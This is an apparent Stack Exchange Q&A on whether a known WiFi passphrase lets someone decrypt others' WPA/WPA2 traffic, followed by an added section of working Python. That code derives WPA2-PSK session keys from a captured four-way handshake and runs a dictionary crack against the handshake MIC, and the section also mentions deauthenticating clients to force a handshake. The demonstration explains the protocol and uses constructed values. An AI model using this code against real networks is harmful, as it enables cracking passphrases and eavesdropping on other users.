
If I connect to a WiFi network using either WEP, WPA or WPA2 encryption, can someone else decipher my communication that they passively received if they know the network's passphrase?

dronus
  • Yes, they can decipher the traffic from wireless to normal Ethernet, but if you are using SSL websites and other encryption on the transport layer it doesn't give them access to that – mubix Jul 23 '16 at 17:04
  • So none of the usual WiFi security schemes protects different users on the same network from sniffing on each other? – dronus Jul 23 '16 at 17:11

1 Answer


The simplified answer for home routers goes something like this:

In the case of WEP it is trivial to decrypt the traffic being transmitted over the wireless network, since the WEP key is used for encryption of packets.

In the case of WPA it is possible, but not as easy as WEP. WPA makes it harder by introducing a four-way handshake during the authentication phase. In this phase, your computer and the access point "agree" on a key which you will use to send future communications to each other. The problem is that if an attacker intercepts the handshake (and knows the pre-shared key), they can figure out what key you're using for encryption and therefore decrypt your data.

Is it possible to avoid this?

Yes. There are other authentication protocols for WPA which are not centred around a pre-shared key - too many for me to provide detailed answers on each. Have a look at "Extensible Authentication Protocol" (EAP) for more information on these.

Depending on the authentication protocol, it can become very difficult to intercept and decrypt traffic. For (an oversimplified) example, public key cryptography may be employed during key exchange in order to ensure that the handshake is properly authenticated; or Diffie-Hellman might be used to set up an encryption key in such a way that, even if all of the handshake is sent in "clear-text", the key is not known.

These authentication protocols are commonly used in enterprise wireless setups, where a pre-shared key is obviously not sufficient for security.

Final Note: The problem you're describing is not exclusive to wireless networks. Whenever there is encrypted traffic between two entities, we must consider the security of the key exchange in determining the security of the whole system.

As was pointed out, HTTPS would be adequate to hide your traffic: even if the wireless packets can be decrypted, the content contained within the packet would be encrypted and therefore unreadable** (** not entirely true).

Further Reading:

https://crypto.stackexchange.com/questions/5927/why-does-wpa-psk-not-use-diffie-hellman-key-exchange

Four-way Handshake in WPA-Personal (WPA-PSK)

What are the difference between WPA2-PSK and WPA2-EAP-PSK?

James Lambeth
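The attack the answer describes for WPA/WPA2-Personal, worked through in code as an added example (this is not code from the original answer; it follows the public 802.11i key hierarchy). The PMK is PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes), the PTK is PRF-512 over the two MAC addresses and the two nonces, and message 2 of the four-way handshake carries an HMAC-SHA1 MIC keyed with the first 16 bytes of the PTK (WPA2/CCMP, key descriptor version 2). Someone who captured the handshake and knows the passphrase recomputes the same PTK and can check it against that MIC; the same check is what a dictionary attack runs when the passphrase is unknown. The MAC addresses, nonces and EAPOL frame below are constructed for the demonstration, not taken from a real capture; the passphrase/SSID pair "password"/"IEEE" is the published 802.11i PBKDF2 test vector.

```python
"""Recover the WPA2-PSK pairwise key (PTK) from a captured 4-way handshake.

Added example, not from the original answer. Addresses, nonces and the
EAPOL-Key frame are constructed here; only the key derivation is standard.
"""
import hashlib
import hmac
import struct

# Offset of the 16-byte Key MIC field inside an EAPOL-Key frame:
# 4 (EAPOL hdr) + 1 (descr type) + 2 (key info) + 2 (key len)
# + 8 (replay ctr) + 32 (nonce) + 16 (IV) + 8 (RSC) + 8 (ID) = 81
MIC_OFFSET = 81


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """802.11i PRF-n: concatenate HMAC-SHA1(key, label || 0x00 || data || i)."""
    out, i = b"", 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        i += 1
    return out[:nbytes]


def ptk_from_pmk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> dict:
    """PTK = PRF-512(PMK, "Pairwise key expansion", min/max(MACs) || min/max(nonces))."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    ptk = prf(pmk, b"Pairwise key expansion", data, 64)
    # KCK signs EAPOL-Key frames, KEK wraps the GTK, TK encrypts data (CCMP).
    return {"kck": ptk[:16], "kek": ptk[16:32], "tk": ptk[32:48]}


def eapol_key_mic(kck: bytes, frame: bytes) -> bytes:
    """Key descriptor version 2 MIC: HMAC-SHA1 over the frame with MIC zeroed."""
    zeroed = frame[:MIC_OFFSET] + b"\x00" * 16 + frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_msg2(snonce: bytes, kck: bytes) -> bytes:
    """What the legitimate client sends as message 2 (constructed, RSN IE omitted)."""
    key_info = 0x010A  # descriptor version 2 | pairwise key type | MIC present
    body = (
        b"\x02"                              # descriptor type: RSN
        + struct.pack(">HH", key_info, 16)   # key info, key length (CCMP = 16)
        + struct.pack(">Q", 1)               # replay counter
        + snonce                             # key nonce (SNonce)
        + b"\x00" * 16                       # key IV
        + b"\x00" * 8                        # key RSC
        + b"\x00" * 8                        # key ID (reserved)
        + b"\x00" * 16                       # MIC placeholder
        + struct.pack(">H", 0)               # key data length
    )
    frame = struct.pack(">BBH", 2, 3, len(body)) + body  # EAPOL v2, type Key
    mic = eapol_key_mic(kck, frame)
    return frame[:MIC_OFFSET] + mic + frame[MIC_OFFSET + 16:]


def crack(candidates, ssid, aa, spa, anonce, snonce, msg2):
    """Eavesdropper: everything but the passphrase comes from the capture."""
    captured_mic = msg2[MIC_OFFSET:MIC_OFFSET + 16]
    for pw in candidates:
        keys = ptk_from_pmk(pmk_from_passphrase(pw, ssid), aa, spa, anonce, snonce)
        if hmac.compare_digest(eapol_key_mic(keys["kck"], msg2), captured_mic):
            return pw, keys          # KCK verified, so TK is the real data key
    return None, None


def demo() -> dict:
    ssid, passphrase = "IEEE", "password"          # 802.11i PBKDF2 test vector
    aa = bytes.fromhex("001122334455")             # constructed AP MAC
    spa = bytes.fromhex("66778899aabb")            # constructed client MAC
    anonce, snonce = bytes(range(32)), bytes(range(32, 64))  # constructed nonces
    # Legitimate client derives its keys and sends message 2.
    pmk = pmk_from_passphrase(passphrase, ssid)
    client = ptk_from_pmk(pmk, aa, spa, anonce, snonce)
    msg2 = build_msg2(snonce, client["kck"])
    # Passive observer with a word list (or simply the known passphrase).
    found, keys = crack(["letmein", "password", "hunter2"], ssid, aa, spa, anonce, snonce, msg2)
    return {"pmk": pmk.hex(), "found": found,
            "tk_match": keys is not None and keys["tk"] == client["tk"]}


if __name__ == "__main__":
    print(demo())
```

Two things follow from this. First, the passphrase alone is not enough: the observer also needs the handshake (ANonce, SNonce, both MACs), which is why tools deauthenticate a client to force one; once they have it, every CCMP frame of that session can be decrypted with the recovered TK. Second, nothing in the derivation is secret apart from the PMK, so the only thing standing between a captured handshake and the TK is the passphrase's strength. WPA (TKIP, descriptor version 1) differs only in using HMAC-MD5 for the MIC. WPA3-Personal replaces this with SAE, a password-authenticated Diffie-Hellman exchange, which is the Diffie-Hellman property the answer alludes to: knowing the passphrase and capturing the exchange no longer yields the session key.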